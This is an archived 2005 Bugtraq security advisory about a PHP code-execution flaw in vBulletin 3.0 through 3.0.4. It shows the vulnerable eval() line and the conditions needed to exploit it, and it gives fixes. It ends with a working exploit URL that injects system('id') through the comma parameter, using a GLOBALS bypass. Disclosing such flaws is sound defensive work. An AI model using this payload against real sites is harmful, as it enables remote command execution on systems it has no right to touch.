lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050213171635.8776.qmail@www.securityfocus.com>
Date: 13 Feb 2005 17:16:35 -0000
From: AL3NDALEEB <al3ndaleeb@....net>
To: bugtraq@...urityfocus.com
Subject: vbulletin 3.0.x PHP code execution




Vulnerable Systems:
 ----------------
 vBulletin version 3.0 up to and including version 3.0.4

 Immune systems:
 ----------------
 vBulletin version 3.0.5
 vBulletin version 3.0.6

 Vulnerable code in forumdisplay.php :
 #############################################################
 if ($vboptions['showforumusers'])
 {
    .
    .
    .
    .

 if ($bbuserinfo['userid'])
 {
    .
    .
    .
    .
    $comma = ', ';
  }
 .
 .
 .
 .
 while ($loggedin = $DB_site->fetch_array($forumusers))
 {
    .
    .
    .
    eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser') . '";');     <<==== (Vuln)
    $comma = ', ';
    .
    .
  }
 .
 .
 }

 #############################################################

 Conditions:
 ----------------
 1st condition   : $vboptions['showforumusers'] == True , the admin must set 
showforumusers ON in vbulletin options.
 2nd condition  : $bbuserinfo['userid'] == 0 , you must be an visitor/guest 
.
 3rd condition  : $DB_site->fetch_array($forumusers) == True , when you 
visit the forums, it  must has at least one user show the forum.
 4th condition   : magic_quotes_gpc must be OFF
 SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in 
init.php by secret array GLOBALS[]=1 ;)))


 Solutions:
 ----------------
 * Disable showforumusers in vbulletin options .
 * add the next line before if ($vboptions['showforumusers'])   
     $comma = '';

 Exploit:
 ----------------
example :
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ